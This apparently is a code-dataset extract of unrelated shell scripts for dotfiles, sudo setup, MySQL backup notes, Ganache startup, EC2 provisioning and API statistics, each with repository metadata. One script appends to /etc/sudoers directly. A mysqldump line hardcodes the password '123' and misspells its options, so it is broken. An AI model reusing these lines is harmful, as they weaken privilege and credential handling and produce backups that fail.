# setenv SSH_AUTH_SOCK $HOME/.screen/ssh-auth-sock.$HOSTNAME
_ssh_auth_save() {
ln -sf "$SSH_AUTH_SOCK" "$HOME/.screen/ssh-auth-sock.$HOSTNAME"
}
alias screen='_ssh_auth_save ; export HOSTNAME=$(hostname) ; screen'
| true
|
f8bf6dc2e1a63eda92ad69177e907eef8750f5ba
|
Shell
|
jlefrique/dotfiles
|
/bin/markup.sh
|
UTF-8
| 191
| 2.734375
| 3
|
[] |
no_license
|
#!/system/bin/sh
# Add markups in Android logcat
COUNTER=1
while read line; do
LINE="Markup #${COUNTER} -- ${line}"
echo ${LINE}
log -t ${LINE}
let COUNTER=COUNTER+1
done
| true
|
c51e81dca8b23ec3c691edf0d595ad0cbf739cef
|
Shell
|
mrosata/kleos
|
/setup-sudo.sh
|
UTF-8
| 1,766
| 4.5
| 4
|
[] |
no_license
|
#!/bin/bash
echo "This script must be ran as root. The reason for this is that"
echo "installing sudo isn't a decision that you can make unless you"
echo "are the root user of a system. This script installs sudo, but"
echo "most systems include sudo already. This is a hack really, I am"
echo "comfortable running this on my system, but you need to make up"
echo "your own mind. Script also adds a user to the /etc/sudoers "
echo "file. "
echo " -- Pass a user name to add to file as only param to script"
ERRNO_USER=103
ERRNO_ROOT=104
if [ "x`id -au`" != "x0" ];then
echo "MUST RUN THIS SCRIPT AS ROOT!"
exit $ERRNO_ROOT
fi
username="$1"
function prompt_user_to_continue {
local question="${1:-Yes (y) or no (n)}"
while true
do
read -p "$question" answer
case $answer in
[yY]* )
break ;;
[nN]* )
exit ;;
* )
echo "Enter either yes (y) or No (n)" ;;
esac
done
}
if [ x"$username" == x ];then
echo "Pass a username as argument to script, IE:"
echo " $0 michael"
exit 1
fi
if id -au "$username" 2>&1 > /dev/null ; then
if [ x`which sudo` == x ];then
# Only continue if user says (yes)
prompt_user_to_continue "Install sudo package?"
apt-get install sudo -y
fi
if [ -f /etc/sudoers ]; then
RES=`cat /etc/sudoers | grep "$username ALL=" | wc -l`
if [ $RES -gt 0 ];then
echo "User is already in sudoers file..."
echo "Use vigr or edit /etc/sudoers manually"
exit 0
fi
# Only add username to sudoers file if user says (yes)
prompt_user_to_continue "Add $username to /etc/sudoers?"
echo "$username ALL=(ALL) ALL" >> /etc/sudoers
fi
else
echo "Sorry, User named \"$username\" not exists"
exit $ERRNO_USER
fi
exit 0
| true
|
e3bdfdbc9125732a582203793c59763309e4e6f1
|
Shell
|
shrekee/code
|
/shell/homework/auto_mysqldump.sh
|
UTF-8
| 2,653
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# File Name: auto_mysqldump.sh
# Author: Liwqiang
# mail: shrekee@qq.com
# Created Time: Sat 04 Aug 2018 09:54:47 PM CST
#在每天凌晨4点(在服务器最冷清时热备份,crontab 来执行),通过mysqldump自动热备份数据库(全备)
#
#热备份的要求:
# 1、因为可能同时有myisam和innodb两种引擎,所以要backup前要锁表;--lock-tables
# 2、全备 所以加参数 --all-databases
# 3、为了将来好还原,可以截断二进制日志,--flush-logs
# 4、为了能认清楚 加参数 --master-data=2()
# 5、myisam 温备份(备份之前务必锁表)
# 6、 --lock-all-tables(全备份)
# 7、 --lock-tables(只备份几张表)
# 8、innoDB 热备份
# --single-transaction
# --flush-logs
# --routines 备份过程和函数
# --triggers 备份触发器
## --events --备份事件
# --master-data=(0|1|2) 2:一般是2;除非用的主从服务器,用1选项;
##
#MySQL热备份的缺点
# 1、浮点数据丢失精度
# 2、备份出的数据占用更大的存储空间,压缩后可节省空间
# 3、不适合对大的数据库完全备份
# 4、也不是对要求准确的使用。。。。
# 5、而且对于innoDB引擎的更大的缺点:
# 加锁过程可能很长(可能几个小时);
##注意:在使用mysqldump进行逻辑上的恢复时,会自动应用于bin_log日志,,
##所以,在使用mysqldump恢复时,必须应临时关闭'set sql_bin_log=0';恢复后,然后再打开;
mysqldump -uroot -p123 --flush-logs --master-data=2 --all-datebases --lock-alltables > /tmp/mysqldump_full_backup
###
### SELECT备份的优缺点::::
### 优点:比mysqldump节省空间,而且恢复时,可以选择只恢复部分数据
### 缺点:不能备份数据结构,而且只能备份单张表格;
###使用 SELECT * INTO OUTFILE ‘/PATH/TO/NAME ’ FROM tables_name[WHERE CLAUSE]; 创建表格备份;
### LOAD DATA INFILE 'FILE_NAME' INTO TABLE TABLE_NAME[WHERE CLAUSE]; 恢复数据
###
#######################################################################
######################################################################
#备份方法三 LVM热备份 --SNAPSHOT
##逻辑卷备份:把数据锁定在瞬间,然后快照,然后释放锁,然后把数据物理copy到别的磁盘
######要求:
# 1、数据文件要求在逻辑卷上;
# 2、此逻辑卷所在卷组必须有足够空间使用快照;
# 3、二进制日志和事物日志,跟数据文件必须在同一个卷;这样才能保持数据一致;
# 4、
#
#
#
| true
|
d55ccba144e0dd455d2dd34996f3b17f23043cac
|
Shell
|
hadasz/web3studio-bootleg
|
/packages/bootleg-common/bin/bootleg-setup-ganache
|
UTF-8
| 775
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
cleanup_ganache() {
# Kill the ganache instance that we started (if we started one and if it's still running).
if [ -n "$ganache_pid" ] && ps -p $ganache_pid > /dev/null; then
echo "Stopping Ganache"
kill $ganache_pid
fi
}
ganache_port=8545
ganache_mnemonic="candy maple cake sugar pudding cream honey rich smooth crumble sweet treat"
ganache_running() {
nc -z localhost "$ganache_port" &> /dev/null
}
start_ganache() {
ganache-cli --port "$ganache_port" --mnemonic "$ganache_mnemonic" > /dev/null &
ganache_pid=$!
while ! ganache_running; do
sleep 0.1
done
}
trap cleanup_ganache EXIT
if ganache_running; then
echo "Using existing ganache instance"
else
echo "Starting our own ganache instance"
start_ganache
fi
| true
|
b0f5a0637d469c310a6b07aa94a46b7cc7ed04ad
|
Shell
|
2019surbhi/mudcookies
|
/src/train-celltype-with-scpred.sh
|
UTF-8
| 1,240
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
usage="
$BASH_SOURCE <seurat.obj> <scpred.obj> [nproc]
<seurat.obj> : cell_type annotation must be in meta.data
<scpred.obj> : scpred object
[nproc] : multi-cores (default 2)
"; if [ $# -lt 1 ];then echo "$usage";exit; fi
ip=$1
op=${2:-"out_scpred.rds"}
nproc=${3:-2}
cat << 'EOF' | sed "s#INPUT#$ip#" | sed "s#OUTPUT#$op#" \
| sed "s#NPROC#$nproc#" >$op.rcmd
# ref: https://powellgenomicslab.github.io/scPred/articles/introduction.html
library("scPred")
library("Seurat")
library("magrittr")
require("doParallel")
require("mda")
input = "INPUT"
output= "OUTPUT"
nproc=NPROC
# test set
if( !file.exists( input ) && input == "test" ){
d = scPred::pbmc_1
}else{
d = readRDS(input);
}
# query data must use the same norm.
d = d %>%
NormalizeData() %>%
FindVariableFeatures() %>%
ScaleData() %>%
RunPCA()
d = getFeatureSpace(d, "cell_type") # default svmRadial
cl = makePSOCKcluster(nproc)
registerDoParallel(cl)
d = trainModel(d, model= "mda", allowParallel=T)
# retraining : d<- trainModel(d, model = "mda", reclassify = c("cMono", "ncMono"))
stopCluster(cl)
scpred=get_scpred(d)
saveRDS(scpred, file=output)
# new_embedding_aligned vs new_embedding : after and before harmony
EOF
R --no-save -f $op.rcmd
| true
|
96c7f9057b763dc6710022d45ad58333abab0025
|
Shell
|
amila-ku/ansible-aws-autoscaling
|
/roles/create_asg/files/user_data_ubuntu.sh
|
UTF-8
| 736
| 2.546875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
sudo apt-get install -y \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
sudo apt-get update
sudo apt-get install -y docker-ce git python
sudo usermod -a -G docker ubuntu
sudo service docker start
curl -L https://github.com/docker/compose/releases/download/1.16.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo git clone https://github.com/amila-ku/wordpress-prometheus.git /wp
cd /wp
docker-compose up -d
| true
|
ca249934a57102f9e0a59564bbe9b20d5ec95266
|
Shell
|
kingsleychow/CardioDBSg
|
/bin/update_V2ENS.sh
|
UTF-8
| 1,715
| 2.546875
| 3
|
[] |
no_license
|
#/bin/bash
##################################################################################################
# 9. V2Ensembls (incremental updates)
##################################################################################################
# called withn bin/update_tables_ater_run.sh
# global variables defined in /etc/profile.d/cardiodb.sh
##################################################################################################
printf "perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --new_entries --v2ensx --annotation\n"
time perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --new_entries --v2ensx --annotation
#printf "perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --not_in_v2ensembl --v2ensx --annotation\n"
#time perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --not_in_v2ensembl --v2ensx --annotation
printf "mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Ensembls/V2Ensembls.all.added.txt\n"
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Ensembls/V2Ensembls.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2dbSNPs/V2dbSNPs.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Phens/V2Phens.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Freqs/V2Freqs.all.added.txt
echo Running V2Families...
# this will trigger 'insert_v2families_and_isnovel_after_v2ensembls'
# However if V2Ensembls is repopuldated freshly, you should run SQL/V2Families.sql and SQL/IsNovel
| true
|
e0ec5fb123dce8b7f862ba6b7381902350016744
|
Shell
|
pierrz/europeana_experiments
|
/statistics/APIstats_ThemColl_v1.1__mainLists.sh
|
UTF-8
| 2,288
| 3.40625
| 3
|
[] |
no_license
|
# ___________________________________________________________________________________
# This script is licensed under the MIT license. (http://opensource.org/licenses/MIT)
# Credits: Pierre-Edouard Barrault
# http://pierrz.com
# Script designed in order to pull statistics from the Europeana Search API and feed into shared Google Spreadsheets.
# Mainly bypass the limitations of ImportJSON.gs script regarding the max URL lenght it can fetch
# (Extra long URLs tend to be an outcome of using extensive Thematic collections queries).
# !/bin/bash
echo "__________________________________"
echo "__________________________________"
echo "### MAIN LISTS SCRIPT ###"
echo "__________________________________"
echo "__________________________________"
# TIMESTAMP FUNCTIONS
timestamp() {
date +"_%Y-%m-%dT%H:%M:%S"
}
DATE=$(timestamp)
# QUERY PARAMETERS
# Output directory
dirOutput="output/migration/mainLists/"
# Thematic Collection query fetched from separate txt file
query_main=$(cat themes/query_migration.txt)
# API key
apiKey=$(cat API_key.txt)
query_apikey_param="&wskey="
query_apikey="$query_apikey_param$apiKey"
# Search API main gears
query_baseUrl="https://www.europeana.eu/api/v2/search.json?start=1&rows=0&qf="
json_ext="json"
# Query parameter
query_all="&query=*"
# Facets
facet_dataProvider="&profile=facets&facet=DATA_PROVIDER&f.DATA_PROVIDER.facet.limit=2000"
facet_provider="&profile=facets&facet=PROVIDER&f.PROVIDER.facet.limit=2000"
query_facet_dataProvider="$query_baseUrl$query_main$query_all$facet_dataProvider$query_apikey"
query_facet_provider="$query_baseUrl$query_main$query_all$facet_provider$query_apikey"
dataProvider_labelFile="migration_dataProviders"
provider_labelFile="migration_providers"
file_dataProvider="$dirOutput$dataProvider_labelFile.$json_ext"
file_provider="$dirOutput$provider_labelFile.$json_ext"
# LISTS
echo "______"
echo " |---> DATA PROVIDERS LIST"
wget -O "$file_dataProvider" "$query_facet_dataProvider"
echo ""
echo " |---> PROVIDERS LIST"
wget -O "$file_provider" "$query_facet_provider"
echo ""
# ZIPPING full output
echo "+++++++++++++++++"
echo "Zipping JSON results"
echo ""
cd output/migration/mainLists
zip "../../../zips/stats_migration_mainLists_$DATE.zip" *.json
cd ../../..
exit 0;
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.